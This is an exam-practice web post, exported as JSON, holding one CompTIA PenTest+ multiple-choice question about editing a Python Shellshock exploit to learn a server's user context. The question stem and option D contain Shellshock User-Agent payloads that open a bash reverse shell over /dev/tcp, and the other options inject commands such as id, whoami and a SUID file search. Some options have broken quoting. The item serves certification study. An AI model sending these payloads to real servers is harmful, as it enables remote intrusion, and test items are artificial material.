{"id":60,"date":"2022-11-26T07:50:01","date_gmt":"2022-11-26T07:50:01","guid":{"rendered":"https:\/\/exampracticetests.com\/c\/PT0-002\/comptia-pentest-pt0-002-question052\/"},"modified":"2022-11-26T07:50:01","modified_gmt":"2022-11-26T07:50:01","slug":"comptia-pentest-pt0-002-question052","status":"publish","type":"post","link":"https:\/\/exampracticetests.com\/c\/PT0-002\/comptia-pentest-pt0-002-question052\/","title":{"rendered":"CompTIA PenTest+ PT0-002 – Question052"},"content":{"rendered":"
A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:
\nexploit = {"User-Agent": "() { ignored;};\/bin\/bash -i>& \/dev\/tcp\/127.0.0.1\/9090 0>&1", "Accept": "text\/html,application\/xhtml+xml,application\/xml"}
\nWhich of the following edits should the tester make to the script to determine the user context in which the server is being run?

A.<\/strong> exploit = {"User-Agent": "() { ignored;};\/bin\/bash -i id;whoami", "Accept": "text\/html,application\/xhtml+xml,application\/xml"}
B.<\/strong> exploit = {"User-Agent": "() { ignored;};\/bin\/bash -i>& find \/ -perm -4000", "Accept": "text\/html,application\/xhtml+xml,application\/xml"}
C.<\/strong> exploit = {"User-Agent": "() { ignored;};\/bin\/sh -i ps -ef" 0>&1", "Accept": "text\/html,application\/xhtml+xml,application\/xml"}
D.<\/strong> exploit = {"User-Agent": "() { ignored;};\/bin\/bash -i>& \/dev\/tcp\/10.10.1.1\/80" 0>&1" "Accept": "text\/html,application\/xhtml+xml,application\/xml"}<\/div>\n

<\/p>\n